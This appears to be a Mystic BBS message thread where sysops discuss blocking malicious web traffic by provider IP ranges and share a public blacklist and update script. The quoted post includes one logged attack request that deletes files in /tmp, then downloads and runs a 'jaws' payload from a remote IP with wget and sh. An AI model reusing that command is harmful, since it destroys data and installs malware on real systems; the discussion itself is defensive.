Subj : Re: IP Block Lists
To   : Warpslide
From : MeaTLoTioN
Date : Sat Mar 19 2022 10:43:10

On 18 Mar 2022, Warpslide said the following...
 
 Wa> Hi All,
 Wa> 
 Wa> I have a web server accessible to the public, which as expected was
 Wa> getting hammered with various bots & script kiddies.
 Wa> 
 Wa> I've setup an IP blocklist for the usual suspects, but I was noticing a
 Wa> lot of malicious traffic from California, Germany, The Netherlands & the
 Wa> UK as well.
 Wa> 
 Wa> Not wanting to block those countries out entirely I decided to dig a
 Wa> little deeper and noticed that many of these addresses had one thing in
 Wa> common: They're coming from Digital Ocean.
 Wa> 
 Wa> Most of these seem to be trying to log into wordpress or bring up other
 Wa> login pages for other services that don't exist on this web server. 
 Wa> Others seem to be a little more insidious:
 Wa> 
 Wa> "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.xx.xxx/jaws;sh+/tmp/jaws
 Wa> HTTP/1.1"
 Wa> 
 Wa> None of these work or do anything on my webserver, but I still don't
 Wa> want them hammering on my system.
 Wa> 
 Wa> Fortunately Digital Ocean publishes a full list of the IP addresses they
 Wa> use: https://digitalocean.com/geo/google.csv
 Wa> 
 Wa> After adding these ranges to my blocklist suddenly my apache logs are a
 Wa> lot quieter.
 Wa> 
 Wa> Do you filter by country/region or by provider?  If so, which IP ranges
 Wa> do you block?
 Wa> 
 Wa> p.s: I know some BBS hubs are located on VPS providers, you may need to
 Wa> modify these lists if you want to use them so you can still communicate
 Wa> with your hub if they happen to use Digital Ocean.  ML looks like he
 Wa> uses OVH so he's safe...  ;)

Good info, I use OVH yes for the UK and CA hubs. I made a publicly available 
blacklist of IP's for mystic bbses along with a sort of door/script thing to 
automagically grab, compare and add new IP's to your local list (mystic only so 



































































































































































































































































































































































































































































































































far).

The main blacklist can be found here;
$ curl https://erb.pw/blacklist

If you want to use my door/script, you can get it here;
https://github.com/christiansacks/mystic-twitupd

Hope this helps out people =)

---
|14Best regards,
|11Ch|03rist|11ia|15n |11a|03ka |11Me|03aTLoT|11io|15N

|07ÄÄ |08[|10eml|08] |15ml@erb.pw |07ÄÄ |08[|10web|08] |15www.erb.pw |07ÄÄÄ¿
|07ÄÄ |08[|09fsx|08]  |1521:1/158 |07ÄÄ |08[|11tqw|08] |151337:1/101 |07ÂÄÄÙ
|07ÄÄ |08[|12rtn|08] |1580:774/81 |07ÄÂ |08[|14fdn|08] |152:250/5 |07ÄÄÄÙ
|07ÄÄ |08[|10ark|08]  |1510:104/2 |07ÄÙ

.... Reward for a job well done: More work

--- Mystic BBS v1.12 A47 2021/12/13 (Linux/64)
 * Origin: thE qUAntUm wOrmhOlE, rAmsgAtE, uK. bbs.erb.pw (1337:1/101)

.